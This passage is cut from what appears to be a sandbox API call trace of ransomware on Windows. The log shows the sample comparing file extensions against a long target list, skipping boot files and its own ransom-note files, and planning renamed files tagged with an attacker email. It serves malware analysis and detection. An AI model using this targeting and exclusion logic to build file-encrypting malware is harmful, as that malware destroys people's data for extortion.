lpString2=".png") returned -1 [0265.315] lstrcmpiW (lpString1=".j2c", lpString2=".png") returned -1 [0265.315] lstrcmpiW (lpString1=".j2k", lpString2=".png") returned -1 [0265.315] lstrcmpiW (lpString1=".java", lpString2="e.png") returned -1 [0265.315] lstrcmpiW (lpString1=".jp2", lpString2=".png") returned -1 [0265.315] lstrcmpiW (lpString1=".jpc", lpString2=".png") returned -1 [0265.315] lstrcmpiW (lpString1=".jpe", lpString2=".png") returned -1 [0265.315] lstrcmpiW (lpString1=".jpeg", lpString2="e.png") returned -1 [0265.315] lstrcmpiW (lpString1=".jpf", lpString2=".png") returned -1 [0265.315] lstrcmpiW (lpString1=".jpg", lpString2=".png") returned -1 [0265.316] lstrcmpiW (lpString1=".jpx", lpString2=".png") returned -1 [0265.316] lstrcmpiW (lpString1=".js", lpString2="png") returned -1 [0265.316] lstrcmpiW (lpString1=".jsf", lpString2=".png") returned -1 [0265.316] lstrcmpiW (lpString1=".json", lpString2="e.png") returned -1 [0265.316] lstrcmpiW (lpString1=".jsp", lpString2=".png") returned -1 [0265.316] lstrcmpiW (lpString1=".kdc", lpString2=".png") returned -1 [0265.316] lstrcmpiW (lpString1=".kmz", lpString2=".png") returned -1 [0265.316] lstrcmpiW (lpString1=".kwm", lpString2=".png") returned -1 [0265.316] lstrcmpiW (lpString1=".lasso", lpString2="ue.png") returned -1 [0265.316] lstrcmpiW (lpString1=".lbi", lpString2=".png") returned -1 [0265.316] lstrcmpiW (lpString1=".lgf", lpString2=".png") returned -1 [0265.316] lstrcmpiW (lpString1=".lgp", lpString2=".png") returned -1 [0265.316] lstrcmpiW (lpString1=".log", lpString2=".png") returned -1 [0265.316] lstrcmpiW (lpString1=".m1v", lpString2=".png") returned -1 [0265.316] lstrcmpiW (lpString1=".m4a", lpString2=".png") returned -1 [0265.316] lstrcmpiW (lpString1=".m4v", lpString2=".png") returned -1 [0265.316] lstrcmpiW (lpString1=".max", lpString2=".png") returned -1 [0265.316] lstrcmpiW (lpString1=".md", lpString2="png") returned -1 [0265.317] lstrcmpiW (lpString1=".mda", lpString2=".png") returned -1 [0265.317] lstrcmpiW (lpString1=".mdb", lpString2=".png") returned -1 [0265.317] lstrcmpiW (lpString1=".mde", lpString2=".png") returned -1 [0265.317] lstrcmpiW (lpString1=".mdf", lpString2=".png") returned -1 [0265.317] lstrcmpiW (lpString1=".mdw", lpString2=".png") returned -1 [0265.317] lstrcmpiW (lpString1=".mef", lpString2=".png") returned -1 [0265.317] lstrcmpiW (lpString1=".mft", lpString2=".png") returned -1 [0265.317] lstrcmpiW (lpString1=".mfw", lpString2=".png") returned -1 [0265.317] lstrcmpiW (lpString1=".mht", lpString2=".png") returned -1 [0265.317] lstrcmpiW (lpString1=".mhtml", lpString2="ue.png") returned -1 [0265.317] lstrcmpiW (lpString1=".mka", lpString2=".png") returned -1 [0265.317] lstrcmpiW (lpString1=".mkidx", lpString2="ue.png") returned -1 [0265.317] lstrcmpiW (lpString1=".mkv", lpString2=".png") returned -1 [0265.317] lstrcmpiW (lpString1=".mos", lpString2=".png") returned -1 [0265.317] lstrcmpiW (lpString1=".mov", lpString2=".png") returned -1 [0265.317] lstrcmpiW (lpString1=".mp3", lpString2=".png") returned -1 [0265.317] lstrcmpiW (lpString1=".mp4", lpString2=".png") returned -1 [0265.317] lstrcmpiW (lpString1=".mpeg", lpString2="e.png") returned -1 [0265.318] lstrcmpiW (lpString1=".mpg", lpString2=".png") returned -1 [0265.318] lstrcmpiW (lpString1=".mpv", lpString2=".png") returned -1 [0265.318] lstrcmpiW (lpString1=".mrw", lpString2=".png") returned -1 [0265.318] lstrcmpiW (lpString1=".msg", lpString2=".png") returned -1 [0265.318] lstrcmpiW (lpString1=".mxl", lpString2=".png") returned -1 [0265.318] lstrcmpiW (lpString1=".myd", lpString2=".png") returned -1 [0265.318] lstrcmpiW (lpString1=".myi", lpString2=".png") returned -1 [0265.318] lstrcmpiW (lpString1=".nef", lpString2=".png") returned -1 [0265.318] lstrcmpiW (lpString1=".nrw", lpString2=".png") returned -1 [0265.318] lstrcmpiW (lpString1=".obj", lpString2=".png") returned -1 [0265.318] lstrcmpiW (lpString1=".odb", lpString2=".png") returned -1 [0265.318] lstrcmpiW (lpString1=".odc", lpString2=".png") returned -1 [0265.318] lstrcmpiW (lpString1=".odm", lpString2=".png") returned -1 [0265.318] lstrcmpiW (lpString1=".odp", lpString2=".png") returned -1 [0265.318] lstrcmpiW (lpString1=".ods", lpString2=".png") returned -1 [0265.318] lstrcmpiW (lpString1=".oft", lpString2=".png") returned -1 [0265.318] lstrcmpiW (lpString1=".one", lpString2=".png") returned -1 [0265.318] lstrcmpiW (lpString1=".onepkg", lpString2="lue.png") returned -1 [0265.318] lstrcmpiW (lpString1=".onetoc2", lpString2="blue.png") returned -1 [0265.318] lstrcmpiW (lpString1=".opt", lpString2=".png") returned -1 [0265.319] lstrcmpiW (lpString1=".oqy", lpString2=".png") returned -1 [0265.319] lstrcmpiW (lpString1=".orf", lpString2=".png") returned -1 [0265.319] lstrcmpiW (lpString1=".p12", lpString2=".png") returned -1 [0265.319] lstrcmpiW (lpString1=".p7b", lpString2=".png") returned -1 [0265.319] lstrcmpiW (lpString1=".p7c", lpString2=".png") returned -1 [0265.319] lstrcmpiW (lpString1=".pam", lpString2=".png") returned -1 [0265.319] lstrcmpiW (lpString1=".pbm", lpString2=".png") returned -1 [0265.319] lstrcmpiW (lpString1=".pct", lpString2=".png") returned -1 [0265.319] lstrcmpiW (lpString1=".pcx", lpString2=".png") returned -1 [0265.319] lstrcmpiW (lpString1=".pdd", lpString2=".png") returned -1 [0265.319] lstrcmpiW (lpString1=".pdf", lpString2=".png") returned -1 [0265.319] lstrcmpiW (lpString1=".pdp", lpString2=".png") returned -1 [0265.319] lstrcmpiW (lpString1=".pef", lpString2=".png") returned -1 [0265.319] lstrcmpiW (lpString1=".pem", lpString2=".png") returned -1 [0265.319] lstrcmpiW (lpString1=".pff", lpString2=".png") returned -1 [0265.319] lstrcmpiW (lpString1=".pfm", lpString2=".png") returned -1 [0265.319] lstrcmpiW (lpString1=".pfx", lpString2=".png") returned -1 [0265.319] lstrcmpiW (lpString1=".pgm", lpString2=".png") returned -1 [0265.320] lstrcmpiW (lpString1=".php", lpString2=".png") returned -1 [0265.320] lstrcmpiW (lpString1=".php3", lpString2="e.png") returned -1 [0265.320] lstrcmpiW (lpString1=".php4", lpString2="e.png") returned -1 [0265.320] lstrcmpiW (lpString1=".php5", lpString2="e.png") returned -1 [0265.320] lstrcmpiW (lpString1=".phtml", lpString2="ue.png") returned -1 [0265.320] lstrcmpiW (lpString1=".pict", lpString2="e.png") returned -1 [0265.320] lstrcmpiW (lpString1=".pl", lpString2="png") returned -1 [0265.320] lstrcmpiW (lpString1=".pls", lpString2=".png") returned -1 [0265.320] lstrcmpiW (lpString1=".pm", lpString2="png") returned -1 [0265.320] lstrcmpiW (lpString1=".png", lpString2=".png") returned 0 [0265.320] lstrcmpiW (lpString1=".USA", lpString2=".png") returned 1 [0265.320] lstrcmpiW (lpString1="boot.ini", lpString2="babyblue.png") returned 1 [0265.320] lstrcmpiW (lpString1="bootfont.bin", lpString2="babyblue.png") returned 1 [0265.320] lstrcmpiW (lpString1="ntldr", lpString2="babyblue.png") returned 1 [0265.320] lstrcmpiW (lpString1="ntdetect.com", lpString2="babyblue.png") returned 1 [0265.320] lstrcmpiW (lpString1="io.sys", lpString2="babyblue.png") returned 1 [0265.320] lstrcmpiW (lpString1="FILES ENCRYPTED.txt", lpString2="babyblue.png") returned 1 [0265.320] lstrcmpiW (lpString1="Info.hta", lpString2="babyblue.png") returned 1 [0265.320] lstrcmpiW (lpString1="payload.exe", lpString2="babyblue.png") returned 1 [0265.320] FindNextFileW (in: hFindFile=0x59b148, lpFindFileData=0x30ff094 | out: lpFindFileData=0x30ff094*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x70d1f29a, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x70d1f29a, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x49cec0f7, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x5354a, dwReserved0=0x0, dwReserved1=0x0, cFileName="BabyBoyMainBackground.wmv", cAlternateFileName="")) returned 1 [0265.320] lstrcmpiW (lpString1=".1cd", lpString2=".wmv") returned -1 [0265.321] lstrcmpiW (lpString1=".3ds", lpString2=".wmv") returned -1 [0265.321] lstrcmpiW (lpString1=".3fr", lpString2=".wmv") returned -1 [0265.321] lstrcmpiW (lpString1=".3g2", lpString2=".wmv") returned -1 [0265.321] lstrcmpiW (lpString1=".3gp", lpString2=".wmv") returned -1 [0265.321] lstrcmpiW (lpString1=".7z", lpString2="wmv") returned -1 [0265.321] lstrcmpiW (lpString1=".accda", lpString2="nd.wmv") returned -1 [0265.321] lstrcmpiW (lpString1=".accdb", lpString2="nd.wmv") returned -1 [0265.321] lstrcmpiW (lpString1=".accdc", lpString2="nd.wmv") returned -1 [0265.321] lstrcmpiW (lpString1=".accde", lpString2="nd.wmv") returned -1 [0265.321] lstrcmpiW (lpString1=".accdt", lpString2="nd.wmv") returned -1 [0265.321] lstrcmpiW (lpString1=".accdw", lpString2="nd.wmv") returned -1 [0265.321] lstrcmpiW (lpString1=".adb", lpString2=".wmv") returned -1 [0265.321] lstrcmpiW (lpString1=".adp", lpString2=".wmv") returned -1 [0265.321] lstrcmpiW (lpString1=".ai", lpString2="wmv") returned -1 [0265.321] lstrcmpiW (lpString1=".ai3", lpString2=".wmv") returned -1 [0265.321] lstrcmpiW (lpString1=".ai4", lpString2=".wmv") returned -1 [0265.321] lstrcmpiW (lpString1=".ai5", lpString2=".wmv") returned -1 [0265.321] lstrcmpiW (lpString1=".ai6", lpString2=".wmv") returned -1 [0265.322] FindNextFileW (in: hFindFile=0x59b148, lpFindFileData=0x30ff094 | out: lpFindFileData=0x30ff094*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x70d6b554, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x70d6b554, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x49cec0f7, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x4f6ca, dwReserved0=0x0, dwReserved1=0x0, cFileName="BabyBoyMainBackground_PAL.wmv", cAlternateFileName="")) returned 1 Thread: id = 62 os_tid = 0x690 [0263.679] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x10000) returned 0x3520078 [0263.679] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x10000) returned 0x3530080 [0263.679] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x10) returned 0x5b3590 [0263.679] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x6) returned 0x5b37e8 [0263.679] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x10) returned 0x5b35a8 [0263.679] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x100000) returned 0x3ce0020 [0263.680] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x10) returned 0x5b35c0 [0263.680] RtlReAllocateHeap (Heap=0x520000, Flags=0x0, Ptr=0x5b35c0, Size=0x20) returned 0x607af8 [0263.680] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x10) returned 0x5b35c0 [0263.680] RtlReAllocateHeap (Heap=0x520000, Flags=0x0, Ptr=0x5b35c0, Size=0x20) returned 0x607a80 [0263.680] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76890000 [0263.680] GetProcAddress (hModule=0x76890000, lpProcName="Wow64DisableWow64FsRedirection") returned 0x768bd650 [0263.680] Wow64DisableWow64FsRedirection (in: OldValue=0x34bff58 | out: OldValue=0x34bff58*=0x0) returned 1 [0263.680] lstrlenW (lpString="kernel32.dll") returned 12 [0263.680] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x607af8 | out: hHeap=0x520000) returned 1 [0263.680] lstrlenA (lpString="Wow64DisableWow64FsRedirection") returned 30 [0263.680] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x607a80 | out: hHeap=0x520000) returned 1 [0263.680] Sleep (dwMilliseconds=0x64) [0263.958] lstrlenW (lpString="BCD") returned 3 [0263.958] CreateFileW (lpFileName="C:\\Boot\\BCD" (normalized: "c:\\boot\\bcd"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0263.958] lstrlenW (lpString="C:\\Boot\\BCD") returned 11 [0263.958] lstrlenW (lpString="C:\\Boot\\BCD") returned 11 [0263.958] lstrlenW (lpString=".doc") returned 4 [0263.958] lstrcmpiW (lpString1=".doc", lpString2="\\BCD") returned -1 [0263.958] lstrlenW (lpString=".docx") returned 5 [0263.958] lstrcmpiW (lpString1=".docx", lpString2="t\\BCD") returned -1 [0263.958] lstrlenW (lpString=".pdf") returned 4 [0263.959] lstrcmpiW (lpString1=".pdf", lpString2="\\BCD") returned -1 [0263.959] lstrlenW (lpString=".xls") returned 4 [0263.959] lstrcmpiW (lpString1=".xls", lpString2="\\BCD") returned -1 [0263.959] lstrlenW (lpString=".xlsx") returned 5 [0263.959] lstrcmpiW (lpString1=".xlsx", lpString2="t\\BCD") returned -1 [0263.959] lstrlenW (lpString=".ppt") returned 4 [0263.959] lstrcmpiW (lpString1=".ppt", lpString2="\\BCD") returned -1 [0263.959] lstrlenW (lpString="C:\\Boot\\BCD") returned 11 [0263.959] lstrlenW (lpString=".zip") returned 4 [0263.959] lstrcmpiW (lpString1=".zip", lpString2="\\BCD") returned -1 [0263.959] lstrlenW (lpString=".rar") returned 4 [0263.959] lstrcmpiW (lpString1=".rar", lpString2="\\BCD") returned -1 [0263.959] lstrlenW (lpString=".bz2") returned 4 [0263.959] lstrcmpiW (lpString1=".bz2", lpString2="\\BCD") returned -1 [0263.959] lstrlenW (lpString=".7z") returned 3 [0263.959] lstrcmpiW (lpString1=".7z", lpString2="BCD") returned -1 [0263.959] lstrlenW (lpString="C:\\Boot\\BCD") returned 11 [0263.959] lstrlenW (lpString=".dbf") returned 4 [0263.959] lstrcmpiW (lpString1=".dbf", lpString2="\\BCD") returned -1 [0263.959] lstrlenW (lpString="C:\\Boot\\BCD") returned 11 [0263.959] lstrlenW (lpString=".1cd") returned 4 [0263.959] lstrcmpiW (lpString1=".1cd", lpString2="\\BCD") returned -1 [0263.959] lstrlenW (lpString="C:\\Boot\\BCD") returned 11 [0263.959] lstrlenW (lpString=".jpg") returned 4 [0263.959] lstrcmpiW (lpString1=".jpg", lpString2="\\BCD") returned -1 [0263.959] lstrlenW (lpString="C:\\Boot\\BCD") returned 11 [0263.959] lstrlenW (lpString="C:\\Boot\\BCD") returned 11 [0263.959] lstrlenW (lpString=".doc") returned 4 [0263.959] lstrcmpiW (lpString1=".doc", lpString2="\\BCD") returned -1 [0263.959] lstrlenW (lpString=".docx") returned 5 [0263.960] lstrcmpiW (lpString1=".docx", lpString2="t\\BCD") returned -1 [0263.960] lstrlenW (lpString=".pdf") returned 4 [0263.960] lstrcmpiW (lpString1=".pdf", lpString2="\\BCD") returned -1 [0263.960] lstrlenW (lpString=".xls") returned 4 [0263.960] lstrcmpiW (lpString1=".xls", lpString2="\\BCD") returned -1 [0263.960] lstrlenW (lpString=".xlsx") returned 5 [0263.960] lstrcmpiW (lpString1=".xlsx", lpString2="t\\BCD") returned -1 [0263.960] lstrlenW (lpString=".ppt") returned 4 [0263.960] lstrcmpiW (lpString1=".ppt", lpString2="\\BCD") returned -1 [0263.960] lstrlenW (lpString="C:\\Boot\\BCD") returned 11 [0263.960] lstrlenW (lpString=".zip") returned 4 [0263.960] lstrcmpiW (lpString1=".zip", lpString2="\\BCD") returned -1 [0263.960] lstrlenW (lpString=".rar") returned 4 [0263.960] lstrcmpiW (lpString1=".rar", lpString2="\\BCD") returned -1 [0263.960] lstrlenW (lpString=".bz2") returned 4 [0263.960] lstrcmpiW (lpString1=".bz2", lpString2="\\BCD") returned -1 [0263.960] lstrlenW (lpString=".7z") returned 3 [0263.960] lstrcmpiW (lpString1=".7z", lpString2="BCD") returned -1 [0263.960] lstrlenW (lpString="C:\\Boot\\BCD") returned 11 [0263.960] lstrlenW (lpString=".dbf") returned 4 [0263.960] lstrcmpiW (lpString1=".dbf", lpString2="\\BCD") returned -1 [0263.960] lstrlenW (lpString="C:\\Boot\\BCD") returned 11 [0263.960] lstrlenW (lpString=".1cd") returned 4 [0263.960] lstrcmpiW (lpString1=".1cd", lpString2="\\BCD") returned -1 [0263.960] lstrlenW (lpString="C:\\Boot\\BCD") returned 11 [0263.960] lstrlenW (lpString=".jpg") returned 4 [0263.960] lstrcmpiW (lpString1=".jpg", lpString2="\\BCD") returned -1 [0263.960] lstrcmpiW (lpString1=".LOG1", lpString2=".USA") returned -1 [0263.961] lstrlenW (lpString="BCD.LOG1") returned 8 [0263.961] CreateFileW (lpFileName="C:\\Boot\\BCD.LOG1" (normalized: "c:\\boot\\bcd.log1"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2c0 [0263.961] GetFileSizeEx (in: hFile=0x2c0, lpFileSize=0x34bff1c | out: lpFileSize=0x34bff1c*=0) returned 1 [0263.961] CloseHandle (hObject=0x2c0) returned 1 [0263.961] lstrlenW (lpString="C:\\Boot\\BCD.LOG1") returned 16 [0263.961] lstrlenW (lpString="C:\\Boot\\BCD.LOG1") returned 16 [0263.961] lstrlenW (lpString=".doc") returned 4 [0263.961] lstrcmpiW (lpString1=".doc", lpString2="LOG1") returned -1 [0263.961] lstrlenW (lpString=".docx") returned 5 [0263.961] lstrcmpiW (lpString1=".docx", lpString2=".LOG1") returned -1 [0263.961] lstrlenW (lpString=".pdf") returned 4 [0263.961] lstrcmpiW (lpString1=".pdf", lpString2="LOG1") returned -1 [0263.961] lstrlenW (lpString=".xls") returned 4 [0263.961] lstrcmpiW (lpString1=".xls", lpString2="LOG1") returned -1 [0263.961] lstrlenW (lpString=".xlsx") returned 5 [0263.961] lstrcmpiW (lpString1=".xlsx", lpString2=".LOG1") returned 1 [0263.961] lstrlenW (lpString=".ppt") returned 4 [0263.961] lstrcmpiW (lpString1=".ppt", lpString2="LOG1") returned -1 [0263.961] lstrlenW (lpString="C:\\Boot\\BCD.LOG1") returned 16 [0263.961] lstrlenW (lpString=".zip") returned 4 [0263.961] lstrcmpiW (lpString1=".zip", lpString2="LOG1") returned -1 [0263.961] lstrlenW (lpString=".rar") returned 4 [0263.961] lstrcmpiW (lpString1=".rar", lpString2="LOG1") returned -1 [0263.961] lstrlenW (lpString=".bz2") returned 4 [0263.961] lstrcmpiW (lpString1=".bz2", lpString2="LOG1") returned -1 [0263.961] lstrlenW (lpString=".7z") returned 3 [0263.961] lstrcmpiW (lpString1=".7z", lpString2="OG1") returned -1 [0263.962] lstrlenW (lpString="C:\\Boot\\BCD.LOG1") returned 16 [0263.962] lstrlenW (lpString=".dbf") returned 4 [0263.962] lstrcmpiW (lpString1=".dbf", lpString2="LOG1") returned -1 [0263.962] lstrlenW (lpString="C:\\Boot\\BCD.LOG1") returned 16 [0263.962] lstrlenW (lpString=".1cd") returned 4 [0263.962] lstrcmpiW (lpString1=".1cd", lpString2="LOG1") returned -1 [0263.962] lstrlenW (lpString="C:\\Boot\\BCD.LOG1") returned 16 [0263.962] lstrlenW (lpString=".jpg") returned 4 [0263.962] lstrcmpiW (lpString1=".jpg", lpString2="LOG1") returned -1 [0263.962] lstrlenW (lpString="C:\\Boot\\BCD.LOG1") returned 16 [0263.962] lstrlenW (lpString="C:\\Boot\\BCD.LOG1") returned 16 [0263.962] lstrlenW (lpString=".doc") returned 4 [0263.962] lstrcmpiW (lpString1=".doc", lpString2="LOG1") returned -1 [0263.962] lstrlenW (lpString=".docx") returned 5 [0263.962] lstrcmpiW (lpString1=".docx", lpString2=".LOG1") returned -1 [0263.962] lstrlenW (lpString=".pdf") returned 4 [0263.962] lstrcmpiW (lpString1=".pdf", lpString2="LOG1") returned -1 [0263.962] lstrlenW (lpString=".xls") returned 4 [0263.962] lstrcmpiW (lpString1=".xls", lpString2="LOG1") returned -1 [0263.962] lstrlenW (lpString=".xlsx") returned 5 [0263.962] lstrcmpiW (lpString1=".xlsx", lpString2=".LOG1") returned 1 [0263.962] lstrlenW (lpString=".ppt") returned 4 [0263.962] lstrcmpiW (lpString1=".ppt", lpString2="LOG1") returned -1 [0263.962] lstrlenW (lpString="C:\\Boot\\BCD.LOG1") returned 16 [0263.962] lstrlenW (lpString=".zip") returned 4 [0263.962] lstrcmpiW (lpString1=".zip", lpString2="LOG1") returned -1 [0263.962] lstrlenW (lpString=".rar") returned 4 [0263.962] lstrcmpiW (lpString1=".rar", lpString2="LOG1") returned -1 [0263.962] lstrlenW (lpString=".bz2") returned 4 [0263.962] lstrcmpiW (lpString1=".bz2", lpString2="LOG1") returned -1 [0263.962] lstrlenW (lpString=".7z") returned 3 [0263.962] lstrcmpiW (lpString1=".7z", lpString2="OG1") returned -1 [0263.963] lstrlenW (lpString="C:\\Boot\\BCD.LOG1") returned 16 [0263.963] lstrlenW (lpString=".dbf") returned 4 [0263.963] lstrcmpiW (lpString1=".dbf", lpString2="LOG1") returned -1 [0263.963] lstrlenW (lpString="C:\\Boot\\BCD.LOG1") returned 16 [0263.963] lstrlenW (lpString=".1cd") returned 4 [0263.963] lstrcmpiW (lpString1=".1cd", lpString2="LOG1") returned -1 [0263.963] lstrlenW (lpString="C:\\Boot\\BCD.LOG1") returned 16 [0263.963] lstrlenW (lpString=".jpg") returned 4 [0263.963] lstrcmpiW (lpString1=".jpg", lpString2="LOG1") returned -1 [0263.963] lstrcmpiW (lpString1=".LOG2", lpString2=".USA") returned -1 [0263.963] lstrlenW (lpString="BCD.LOG2") returned 8 [0263.963] CreateFileW (lpFileName="C:\\Boot\\BCD.LOG2" (normalized: "c:\\boot\\bcd.log2"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2c0 [0263.963] GetFileSizeEx (in: hFile=0x2c0, lpFileSize=0x34bff1c | out: lpFileSize=0x34bff1c*=0) returned 1 [0263.963] CloseHandle (hObject=0x2c0) returned 1 [0263.963] lstrlenW (lpString="C:\\Boot\\BCD.LOG2") returned 16 [0263.963] lstrlenW (lpString="C:\\Boot\\BCD.LOG2") returned 16 [0263.963] lstrlenW (lpString=".doc") returned 4 [0263.963] lstrcmpiW (lpString1=".doc", lpString2="LOG2") returned -1 [0263.963] lstrlenW (lpString=".docx") returned 5 [0263.963] lstrcmpiW (lpString1=".docx", lpString2=".LOG2") returned -1 [0263.963] lstrlenW (lpString=".pdf") returned 4 [0263.963] lstrcmpiW (lpString1=".pdf", lpString2="LOG2") returned -1 [0263.963] lstrlenW (lpString=".xls") returned 4 [0263.963] lstrcmpiW (lpString1=".xls", lpString2="LOG2") returned -1 [0263.964] lstrlenW (lpString=".xlsx") returned 5 [0263.964] lstrcmpiW (lpString1=".xlsx", lpString2=".LOG2") returned 1 [0263.964] lstrlenW (lpString=".ppt") returned 4 [0263.964] lstrcmpiW (lpString1=".ppt", lpString2="LOG2") returned -1 [0263.964] lstrlenW (lpString="C:\\Boot\\BCD.LOG2") returned 16 [0263.964] lstrlenW (lpString=".zip") returned 4 [0263.964] lstrcmpiW (lpString1=".zip", lpString2="LOG2") returned -1 [0263.964] lstrlenW (lpString=".rar") returned 4 [0263.964] lstrcmpiW (lpString1=".rar", lpString2="LOG2") returned -1 [0263.964] lstrlenW (lpString=".bz2") returned 4 [0263.964] lstrcmpiW (lpString1=".bz2", lpString2="LOG2") returned -1 [0263.964] lstrlenW (lpString=".7z") returned 3 [0263.964] lstrcmpiW (lpString1=".7z", lpString2="OG2") returned -1 [0263.964] lstrlenW (lpString="C:\\Boot\\BCD.LOG2") returned 16 [0263.964] lstrlenW (lpString=".dbf") returned 4 [0263.964] lstrcmpiW (lpString1=".dbf", lpString2="LOG2") returned -1 [0263.964] lstrlenW (lpString="C:\\Boot\\BCD.LOG2") returned 16 [0263.964] lstrlenW (lpString=".1cd") returned 4 [0263.964] lstrcmpiW (lpString1=".1cd", lpString2="LOG2") returned -1 [0263.964] lstrlenW (lpString="C:\\Boot\\BCD.LOG2") returned 16 [0263.964] lstrlenW (lpString=".jpg") returned 4 [0263.964] lstrcmpiW (lpString1=".jpg", lpString2="LOG2") returned -1 [0263.964] lstrlenW (lpString="C:\\Boot\\BCD.LOG2") returned 16 [0263.964] lstrlenW (lpString="C:\\Boot\\BCD.LOG2") returned 16 [0263.964] lstrlenW (lpString=".doc") returned 4 [0263.964] lstrcmpiW (lpString1=".doc", lpString2="LOG2") returned -1 [0263.964] lstrlenW (lpString=".docx") returned 5 [0263.964] lstrcmpiW (lpString1=".docx", lpString2=".LOG2") returned -1 [0263.964] lstrlenW (lpString=".pdf") returned 4 [0263.964] lstrcmpiW (lpString1=".pdf", lpString2="LOG2") returned -1 [0263.964] lstrlenW (lpString=".xls") returned 4 [0263.964] lstrcmpiW (lpString1=".xls", lpString2="LOG2") returned -1 [0263.965] lstrlenW (lpString=".xlsx") returned 5 [0263.965] lstrcmpiW (lpString1=".xlsx", lpString2=".LOG2") returned 1 [0263.965] lstrlenW (lpString=".ppt") returned 4 [0263.965] lstrcmpiW (lpString1=".ppt", lpString2="LOG2") returned -1 [0263.965] lstrlenW (lpString="C:\\Boot\\BCD.LOG2") returned 16 [0263.965] lstrlenW (lpString=".zip") returned 4 [0263.965] lstrcmpiW (lpString1=".zip", lpString2="LOG2") returned -1 [0263.965] lstrlenW (lpString=".rar") returned 4 [0263.965] lstrcmpiW (lpString1=".rar", lpString2="LOG2") returned -1 [0263.965] lstrlenW (lpString=".bz2") returned 4 [0263.965] lstrcmpiW (lpString1=".bz2", lpString2="LOG2") returned -1 [0263.965] lstrlenW (lpString=".7z") returned 3 [0263.965] lstrcmpiW (lpString1=".7z", lpString2="OG2") returned -1 [0263.965] lstrlenW (lpString="C:\\Boot\\BCD.LOG2") returned 16 [0263.965] lstrlenW (lpString=".dbf") returned 4 [0263.965] lstrcmpiW (lpString1=".dbf", lpString2="LOG2") returned -1 [0263.965] lstrlenW (lpString="C:\\Boot\\BCD.LOG2") returned 16 [0263.965] lstrlenW (lpString=".1cd") returned 4 [0263.965] lstrcmpiW (lpString1=".1cd", lpString2="LOG2") returned -1 [0263.965] lstrlenW (lpString="C:\\Boot\\BCD.LOG2") returned 16 [0263.965] lstrlenW (lpString=".jpg") returned 4 [0263.965] lstrcmpiW (lpString1=".jpg", lpString2="LOG2") returned -1 [0263.965] lstrcmpiW (lpString1=".mui", lpString2=".USA") returned -1 [0263.965] lstrlenW (lpString="bootmgr.exe.mui") returned 15 [0263.965] CreateFileW (lpFileName="C:\\Boot\\cs-CZ\\bootmgr.exe.mui" (normalized: "c:\\boot\\cs-cz\\bootmgr.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2c0 [0263.966] GetFileSizeEx (in: hFile=0x2c0, lpFileSize=0x34bff1c | out: lpFileSize=0x34bff1c*=89168) returned 1 [0263.966] CloseHandle (hObject=0x2c0) returned 1 [0263.966] GetFileAttributesW (lpFileName="C:\\Boot\\cs-CZ\\bootmgr.exe.mui" (normalized: "c:\\boot\\cs-cz\\bootmgr.exe.mui")) returned 0x20 [0263.966] GetFileAttributesW (lpFileName="C:\\Boot\\cs-CZ\\bootmgr.exe.mui.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\boot\\cs-cz\\bootmgr.exe.mui.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0263.966] CreateFileW (lpFileName="C:\\Boot\\cs-CZ\\bootmgr.exe.mui" (normalized: "c:\\boot\\cs-cz\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0263.966] lstrlenW (lpString="C:\\Boot\\cs-CZ\\bootmgr.exe.mui") returned 29 [0263.966] lstrlenW (lpString="C:\\Boot\\cs-CZ\\bootmgr.exe.mui") returned 29 [0263.966] lstrlenW (lpString=".doc") returned 4 [0263.966] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1 [0263.966] lstrlenW (lpString=".docx") returned 5 [0263.966] lstrcmpiW (lpString1=".docx", lpString2="e.mui") returned -1 [0263.966] lstrlenW (lpString=".pdf") returned 4 [0263.966] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1 [0263.966] lstrlenW (lpString=".xls") returned 4 [0263.966] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1 [0263.966] lstrlenW (lpString=".xlsx") returned 5 [0263.966] lstrcmpiW (lpString1=".xlsx", lpString2="e.mui") returned -1 [0263.966] lstrlenW (lpString=".ppt") returned 4 [0263.966] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1 [0263.966] lstrlenW (lpString="C:\\Boot\\cs-CZ\\bootmgr.exe.mui") returned 29 [0263.966] 